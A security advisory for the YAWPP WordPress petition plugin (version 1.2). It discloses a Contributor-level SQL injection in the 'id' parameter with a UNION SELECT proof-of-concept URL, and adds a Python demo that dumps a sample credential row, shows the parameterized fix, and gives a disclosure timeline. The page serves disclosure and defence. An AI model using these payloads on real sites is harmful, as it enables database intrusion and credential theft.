wp-plugin : yawpp

Plugin Details
Plugin Name: wp-plugin : yawpp
Affected Version : 1.2 (and most probably lower versions, if any)
Vulnerability : SQL Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Contributor
PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=yawpp&section=update&id=2 union select 1,3,concat(database(),system_user(),@@version),2,user(),4

(The "&section=" parameter is commonly mangled to "§ion=" when the URL passes through an HTML renderer, because "&sect" is a legacy named entity; send it as "&section=". The spaces in the payload must be URL-encoded when the request is sent. The six-value UNION shows that the underlying query selects six columns, with the attacker-controlled expressions placed in the third and fifth.)

Vulnerable Parameter : “id”

Vulnerable pages : multiple admin pages of the plugin where the “id” parameter is used.
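The query shape implied by the PoC, as an added example that is not the plugin's code: a six-column SELECT with the "id" request parameter concatenated into the SQL text, next to the parameterized version that closes the hole. The table and column names, the in-memory SQLite database, the "users" table standing in for wp_users and the sample rows are all constructed assumptions; the MySQL-only functions from the PoC (database(), system_user(), @@version, user()) are replaced by a cross-table read so the block runs on SQLite and shows what a UNION actually buys the attacker.

```python
import sqlite3

# Constructed in-memory stand-in for the plugin's database. The real yawpp
# table and column names are not given on the page; these six columns are an
# assumption chosen only to match the six-column UNION in the PoC.
SCHEMA = """
CREATE TABLE petitions (
    id INTEGER PRIMARY KEY,
    title TEXT,
    description TEXT,
    max_signs INTEGER,
    owner TEXT,
    enabled INTEGER
);
CREATE TABLE users (
    user_login TEXT,
    user_pass TEXT,
    user_email TEXT
);
"""
PETITIONS = [
    (1, "Save the park", "Keep the park public", 100, "alice", 1),
    (2, "Bike lanes", "More bike lanes downtown", 500, "bob", 1),
]
# Constructed sample credential row; the hash is a placeholder string.
USERS = [("admin", "$P$Bconstructedhashvalue", "admin@example.test")]

# What a Contributor-level user supplies as id=. Modelled on the page's PoC
# (same column positions), with the MySQL functions swapped for a read of the
# users table so it runs on SQLite.
PAYLOAD = "2 union select 1,3,user_login || ':' || user_pass,2,user_email,4 from users"


def fresh_db():
    """Build the constructed database from scratch."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO petitions VALUES (?,?,?,?,?,?)", PETITIONS)
    conn.executemany("INSERT INTO users VALUES (?,?,?)", USERS)
    return conn


def load_petition_vulnerable(conn, id_param):
    """The flaw: the request parameter becomes part of the SQL text."""
    sql = ("SELECT id, title, description, max_signs, owner, enabled "
           "FROM petitions WHERE id = " + id_param)
    return conn.execute(sql).fetchall()


def load_petition_fixed(conn, id_param):
    """The fix: enforce the integer type, then bind the value as a parameter."""
    try:
        petition_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    sql = ("SELECT id, title, description, max_signs, owner, enabled "
           "FROM petitions WHERE id = ?")
    return conn.execute(sql, (petition_id,)).fetchall()


def demo():
    """Return (credentials leaked through the vulnerable path, payload rejected by the fixed path)."""
    conn = fresh_db()
    leaked = load_petition_vulnerable(conn, PAYLOAD)
    # The injected UNION row carries the users table into the "description"
    # column; its "title" column is the literal 3 from the payload.
    stolen = [row[2] for row in leaked if row[1] == 3]
    try:
        load_petition_fixed(conn, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return stolen, blocked


if __name__ == "__main__":
    print(demo())
```

In a WordPress plugin the equivalent of load_petition_fixed is casting the parameter with intval() and, where it reaches SQL, passing it through $wpdb->prepare() with a %d placeholder rather than building the query string by hand.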


Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=834445%40yawpp&old=824042%40yawpp&sfp_email=&sfph_mail=#file36

Disclosure Timeline
Vendor Contacted : 2013-12-21
Plugin Status : Updated on 2014-01-07
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
YAWPP (Yet Another WordPress Petition Plugin) is a really simple plugin that allows you to add petition forms and signatories to your pages or posts by adding shortcodes. It allows you to create highly customisable petitions in a really easy way.

= Features =
NEW
* An option to make some fields "unique" in order not to allow people to sign more than one time
* An Export option to export the signatories list to an Excel file
* English translation

YAWPP adds a new admin page where you can :
* Create new petitions
* Choose the maximum number of signatories you wish to display
* Add some fields to your petition
* Make some fields "private" in order not to show them when displaying the signatories list
* See the list of petitions created
* See the list of signatories for each petition
* Enable/Disable each petition
* Delete each petition
* Delete each signatory

With YAWPP you can create any petition you want and add any field you want to your signing form. For each field you add, you can choose what type of field you want to add :
* text : A simple text field
* Comment : A textarea field
* Mail : A mail field
* Checkbox : A simple checkbox

= Easy to use =
In order to include your petition form or signatories list, you need to add shortcodes to your page/post as in this example :
* [yawpp-form-ID] For the petition form
* [yawpp-signs-ID] For the signatories list
* [yawpp-num-signs-ID] to show the number of signatories

= Coming Soon =
* Choose if you wish to send a confirmation mail to each signatory

If you have a suggestion for a new add-on, feel free to email me at seb@le-gall.net
YAWPP is developed by [Sébastien Le Gall](http://ostenta.fr "Ostenta")